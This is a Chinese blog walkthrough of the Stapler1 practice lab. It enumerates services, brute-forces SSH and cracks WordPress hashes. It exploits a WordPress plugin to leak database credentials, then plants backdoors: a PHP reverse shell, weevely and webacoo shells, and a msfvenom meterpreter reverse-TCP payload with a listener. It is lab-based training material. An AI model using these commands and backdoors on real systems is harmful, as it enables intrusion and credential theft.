【网络安全】红队渗透项目之Stapler1(上)

声明:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

一、信息收集

信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用nmap来演示信息收集:

1、nmap扫描存活IP

由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:

image.png

发现本kali ip为40段!用40段进行全网段扫描:

nmap -sP 192.168.40.0/24
image.png

发现项目IP为152!

2、nmap全端口服务枚举

进行namp全端口服务枚举:

nmap -sS -sV -A -T5 -p- 192.168.40.152
image.png
image.png

得到开放的端口信息:

21/tcp    open   ftp         vsftpd 2.0.8 or later  
ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open   domain      dnsmasq 2.75
80/tcp    open   http        PHP cli server 5.5 or later123/tcp   closed ntp
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom? message2.jpgUT 
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))

以及smb2(windows445端口,共享用)利用!
可以看到有很多容易受到攻击的端口都开着,FTP、NetBIOS、MySQL和运行Web服务器(Apache HTTPD)的端口12380等等!

二、各类服务端口信息枚举

【网络安全相关技术文档】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记

1、FTP信息枚举

根据nmap全端口服务枚举的提示,ftp允许匿名登录:

21/tcp    open   ftp         vsftpd 2.0.8 or later  
ftp-anon: Anonymous FTP login allowed (FTP code 230)

1)ftp匿名登录枚举

image.png
ftp 192.168.40.152
get note     ---下载note文件

未授权登录成功,查到note文件,并下载查看!

2)查看note文件

通过ftp下载该文件进行查看:

image.png
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

里面是txt文本信息:说将账号信息留存在FTP中,那么还有别的账号密码!
获得两个用户名:Elly、John,其他无可用信息!

2、Samba信息收集

这是139的Samba服务,可以用smbclient来查看。

smbclient是一个开放的netbios-ssn,用smbclient来查看(属于samba套件,它提供一种命令行使用交互式方式访问samba服务器的共享资源)!用Enum4linux枚举,这是一个用于枚举来自Windows和Samba系统的信息的工具。

1)Enum4linux枚举

enum4linux -a 192.168.40.152
-a   做所有参数选项枚举一遍
image.png
image.png

获取到2个可用信息: 1. ok活跃信息:

//192.168.40.152/kathy  Mapping: OK, Listing: OK
//192.168.40.152/tmp    Mapping: OK, Listing: OK

kathy和tmp两个信息非常活跃!可以用smbclient连接!

2. 发现了20个用户信息

image.png

kathy和tmp两个信息非常活跃!可以用smbclient连接!

2)保存用户信息,并筛查

gedit user.txt
cat user.txt | cut -d '\' -f2 | cut -d ' ' -f1 > user.txt
image.png

将通过筛选剔除后,获得正常的用户名:user.txt!

3、暴力破解ssh信息枚举

1)hydra暴力破解

nmap扫描ssh端口为开放状态,利用hydra爆破

hydra -L user.txt -P user.txt 192.168.40.152 ssh
image.png
login: SHayslett   password: SHayslett

获得ssh登录账号密码!

2)ssh登录

ssh尝试登录:

ssh SHayslett@192.168.40.152 
image.png

登录成功!到了这一步有非常多的提权方法,咱们继续分析该项目环境!

4、nc信息枚举666端口

1)访问http端口

通过浏览器访问该端口:

http://192.168.40.152:666/
image.png

发现这是一个文件!

2)nc下载文件

通过nc访问该端口进行探测:

nc 192.168.40.152 666 >test   #将文件下载为test     
file test                     #查看test版本
unzip -h                      #看下zip版本信息
unzip test                    #用zip解压test文件
image.png

通过nc下载压缩文件,并解压获得message2的jpg图片!

3)Strings查看图片信息

strings查看该图片隐藏信息:

strings message2.jpg
image.png

给了两个cookie值,先留着该信息!

5、枚举12380端口信息收集

1)访问端口

用浏览器访问该页面:

http://192.168.40.152:12380/
image.png

发现该页面没有可利用的信息,进行漏扫看看!

2)Nikto扫描URL

nikto 是一款开放源代码的、功能强大的 WEB 扫描评估软件,能对 web 服务器多种安全项目进行测试的扫描软件,去寻找已知有名的漏洞,能在230多种服务器上扫描出2600多种有潜在危险的文件、CGI 及其他问题,它可以扫描指定主机的 WEB 类型、主机名、特定目录、COOKIE、特定 CGI 漏洞、返回主机允许的 http 模式等等。

nikto -h http://192.168.40.152:12380/
image.png

发现三个目录/admin112233/、/blogblog/、/phpmyadmin/,发现提示SSL Info,说明是ssl访问的,可以https访问,尝试访问http访问会重定向回来,需要HTTPS访问URL!

3)ssl访问

先枚举访问/admin112233目录:

https://192.168.40.152:12380/admin112233/
image.png

回显:This could of been a BeEF-XSS hook ;),存在XSS!

枚举访问/blogblog目录:

https://192.168.40.152:12380/blogblog/
image.png

发现该网站的是用WordPress搭建的,版本是4.2.1

枚举访问/phpmyadmin目录:

https://192.168.40.152:12380/phpmyadmin
image.png

得到phpmyadmin的后台登录界面,需要账户密码!

6、Wpscan信息收集

从blogblog目录可以发现该站存在wordpress站!可利用wpscan进行枚举扫描!

1)wpscan扫描blogblog网页

wpscan --url https://192.168.40.152:12380/blogblog/ --disable-tls-checks

--disable-tls-checks  ---因为会受到SSL对等证书/SSH错误临时用法!
image.png
image.png

提示我们登录https://wpscan.com/register获取wpscan API令牌,才能输出漏洞数据

2)获取wpscan API令牌

需要访问官网,获取密匙:

https://wpscan.com/register
image.png

在官网登录后主页面存在API Token复制即可!

3)wpscan扫描

通过获取的token直接开始扫描:

wpscan --url https://192.168.40.152:12380/blogblog/  -e u --api-token kJ4bhZCgveCcoGJPER7AOsHJTeFDf90Wfj9zu0V6asc --disable-tls-checks
image.png
image.png

扫描发现该目录:blogblog/wp-content/,访问下收集信息!还存在很多漏洞CVE信息,如感兴趣可深入研究!

4)访问发现有3个子目录

在blogblog/wp-content/plugins/发现:

image.png

发现存在advanced_video_embed.php,提示存在wordpress advanced video插件模块信息!

三、wordpress advanced漏洞利用

1、39646 exp利用

谷歌搜索:

wordpress advanced video exploit
image.png

可以利用39646,在kali上查找并利用!

2、查找并利用py脚本

kali渗透系统自带很多exp脚本,直接查找即可!

cp /usr/share/exploitdb/exploits/php/webapps/39646.py .
image.png

将exp复制到利用目录!

3、修改exp代码

添加修改以下内容:

import ssl
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://192.168.40.152:12380/blogblog/"
image.png

4、访问URL文件上传页面:

通过修改exp代码,进行对项目环境渗透行为后,在upload目录会出现新的文件内容:

https://192.168.40.152:12380/blogblog/wp-content/uploads
image.png

目录下会出现图片:193104749.jpeg,下载:

wget --no-check-certificate https://192.168.40.152:12380/blogblog/wp-content/uploads/193104749.jpeg
--no-check-certificate  ---这个参数可促使wget下载ssl文件
image.png

下载后进行分析图片信息!

5、图片信息枚举

file查看图片类型:

image.png
193104749.jpeg: PHP script, ASCII text

这是一个php代码的txt文本!直接查看!

image.png
define('DB_USER', 'root');
define('DB_PASSWORD', 'plbkac');

获得mysql用户名密码:

root/plbkac

接下来使用账号密码直接枚举数据库!

四、Mysql信息枚举+暴力破解

1、库表信息枚举

利用图片枚举出的mysql数据库账号密码进行枚举:

mysql -uroot -pplbkac -h 192.168.40.152   #利用获得的账户密码远程登录
show databases;             #查看数据库信息
use wordpress               #进入wordpress
show tables;                #查看表信息
image.png

通过mysql命令枚举到数据库wordpress库中存在wp_users表信息!

2、表字段信息枚举

读取wp_user用户表数据:

desc wp_users;
select user_login,user_pass from wp_users;
或者select * from wp_users;
image.png

通过select枚举出该表所有信息内容存在用户名和MD5加密的密码信息!将数据保存至本地:

gedit 1.txt
image.png

3、AWK分解保存

使用awk进行文本出来提取user_pass这个字段所有值,在保存至pass.txt
awk拆分密码信息:密码在第3部分

awk -F'|' '{print $3}' 1.txt > pass.txt
image.png

4、john爆破密码本

继续使用John的rockyou文本对mysql密码信息进行爆破:

john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
image.png
$P$B7889EMq/erHIuZapMB8GEizebcIy9.:incorrect

发现对应john用户,密码为incorrect

五、Getshell

通过暴力破解数据库中的密码值,发现了账号密码信息可直接登录wordpress后台,登录后有很多方法可以getshell,接下来就简单介绍利用!

1、登录后台

访问后台页面,用账户:john,密码:incorrect

https://192.168.40.152:12380/blogblog/wp-login.php
image.png

测试可成功登录!

2、文件上传

Plugins-》 add New -》upload Plugin :存在上传文件

image.png

3、php-webshell利用

复制phpshell到本文件夹:

cp /usr/share/webshells/php/php-reverse-shell.php .
image.png

配置PHP文件,将IP更改为本地kail IP:

image.png

修改完成即可上传文件!上传PHP文件:

image.png

查看是否上传成功:

image.png

上传成功!本地开启nc服务,并访问后门进行反弹shell:

nc -vlp 1234
https://192.168.40.152:12380/blogblog/wp-content/uploads/php-reverse-shell.php
image.png

成功获得反弹shell,并控制项目环境服务器!

4、weevely利用

1)利用weevely生成PHP木马文件

Weevely是一个隐形的PHP网页的外壳,模拟的远程连接。

软件特点:

生成和管理很难检测到的PHP木马,这是一个Web应用程序后开发的重要工具,可用于像一个隐藏的后门,作为一个有用的远程控制台更换管理网络帐户,即使托管在免费托管服务。只是生成并上传“服务器”目标Web服务器上的PHP代码,Weevely客户端在本地运行shell命令传输。

weevely generate pass11 test.php   ---生成test.php文件密码为passtest
generate  ---生成新代理
image.png

weevely的优势在于免杀性,可看到php木马信息是混淆过的特征!

2)上传文件

image.png

验证上传是否成功:

image.png

成功上传!

3)运行该PHP文件,获得shell

weevely https://192.168.40.152:12380/blogblog/wp-content/uploads/test.php passtest
image.png

成功获得shell,该shell很稳定!

5、webacoo利用

WeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具。 借助HTTP协议,它可在客户端和Web服务器之间实现执行代码的网页终端。 WeBaCoo的精妙之处在于,Web服务器和客户端之间的通信载体是Cookie。

1)webacoo生成PHP后门文件

webacoo -g -o webacoo.php
-g 生成后门代码(需要-o)
-o OUTPUT 生成的后门输出文件名
image.png

可看到webacoo也是通过特征混淆了php木马,但是没用weevely免杀性能好!

2)后台页面上传该PHP后门

image.png

访问是否上传成功:

image.png

成功上传!

3)远程连接执行PHP文件

webacoo -t -u https://192.168.40.152:12380/blogblog/wp-content/uploads/webacoo.php

-t 建立远程“终端”连接(需要-u)
-u URL 后门 URL 
image.png

成功获得shell,该shell很稳定!

6、Msfconsole上线webshell

Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。

1)kali本地生成webshell

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.40.149 LPORT=4455 -f raw > msf.php

--LHOST 为kali本地IP
--LPORT 为连接端口
image.png

生成成功msf.php木马文件!

2)后台上传PHP文件

image.png

上传成功:

image.png

成功上传后需要msf开启监听!

3)msf开启监听

开启msfconsole进入MSF框架:

msfconsole
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST 192.168.40.149
set LPORT 4455
run
image.png

开启监听后,访问msf.php文件触发,可看到反弹shell成功!

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,504评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,434评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,089评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,378评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,472评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,506评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,519评论 3 413
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,292评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,738评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,022评论 2 329
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,194评论 1 342
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,873评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,536评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,162评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,413评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,075评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,080评论 2 352

推荐阅读更多精彩内容